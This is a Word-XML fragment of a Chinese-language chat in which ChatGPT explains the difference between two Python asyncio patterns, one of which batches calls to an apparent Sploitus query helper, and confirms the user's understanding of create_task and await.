    </w:p>
    <w:p w14:paraId="64AA61DA" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和我说说第一段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7778C6D4" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [ querySploitus(url=url, data_offset=10*x) for x in range(0,10) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F709CA9" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E370418" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop.run_until_complete(asyncio.wait(task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA4DA92" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6261E250" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6033F7A5" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B053F3" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B917768" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    task1 = asyncio.create_task(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569E9A5C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        say_after(1, 'hello'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D94A380" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A512470" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    task2 = asyncio.create_task(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EFCCB5" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        say_after(2, 'world'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8D0470" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BEFF782" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    print(f"started at {time.strftime('%X')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF70042" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D1A923" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # Wait until both tasks are completed (should take around 2 seconds.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3352704B" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个任务同时执行，直到到所有任务执行完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAAB925" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await task1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8DC0B8" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await task2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25272B7C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ABC0950" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(f"finished at {time.strftime('%X')}")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABE3706" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E51CFC5" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239CBCAB" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这两段代码都是在做并发执行的任务，但是它们使用的方法略有不同。我将逐一解释。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFEA896" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A9672BD" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在第一段代码中：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC73E3" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B679EC" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43701DE3" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F376E6C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [ querySploitus(url=url, data_offset=10*x) for x in range(0,10) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9400B9" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EC8ABA" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop.run_until_complete(asyncio.wait(task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6192F362" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8FF36E" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">querySploitus(url=url, data_offset=10*x) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个异步任务，它们被保存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task_list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表中。然后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.get_event_loop() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取当前的事件循环，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">loop.run_until_complete(asyncio.wait(task_list)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使得所有在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task_list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的异步任务并发执行。这里的关键是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.wait(task_list) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回一个可以完成所有任务的单一的协程，并且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> loop.run_until_complete() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在所有任务完成之前会阻塞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767AB453" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C64CD89" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在第二段代码中：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222DE480" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55A3D346" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ECF6EE" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C9BB6B" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272798C4" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    task1 = asyncio.create_task(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C6714" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        say_after(1, 'hello'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAB35DF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C3E6A0D" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    task2 = asyncio.create_task(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11775DDA" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        say_after(2, 'world'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B58219A" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0DEDA1" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(f"started at {time.strftime('%X')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04622DC8" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45830189" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # Wait until both tasks are completed (should take around 2 seconds.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDEC13B" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await task1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A7D3D0" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await task2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4275DB88" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E73CBBF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(f"finished at {time.strftime('%X')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C21F8" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18902128" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.create_task(coro) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是用来并发运行协程的。它立即启动了协程，并不需要等待它们完成。然后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">await task1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await task2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> main </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成前会暂停。在此期间，事件循环可以去做其他的事情（比如运行其他协程）。这与第一段代码的区别在于，我们在这里直接使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字来等待任务，而不是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> loop.run_until_complete()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C54AAF5" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="072F7863" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总的来说，这两种方式都可以达到并发执行多个任务的目的，但它们的用法和适用的场景略有不同。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.run_until_complete() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更适用于顶层的代码，因为它直接运行事件循环；而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.create_task() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更适用于协程内部，因为它们可以让协程在等待其他任务时做其他的事情。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432A1959" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411B4BB1" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里是不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>task1 = asyncio.create_task()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就会执行代码，但是此时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以执行第二个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>task2 = asyncio.create_task()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>几乎同时运行，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只是等待他们完成而已？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F338F67" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081154EA" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF3371A" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是的，你的理解是正确的。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.create_task(coro) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数会立即启动传入的协程（也就是说，它会将这个协程提交到事件循环中去执行），然后立即返回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Task </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象代表了这个正在运行的协程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C95ACB9" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75100B99" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的事件循环可以同时处理多个任务。因此，当你写下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task1 = asyncio.create_task(coro1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task2 = asyncio.create_task(coro2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，这两个协程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> coro1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> coro2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会被几乎同时提交给事件循环，并且开始并发执行。</w:t>
      </w:r>
    </w:p>
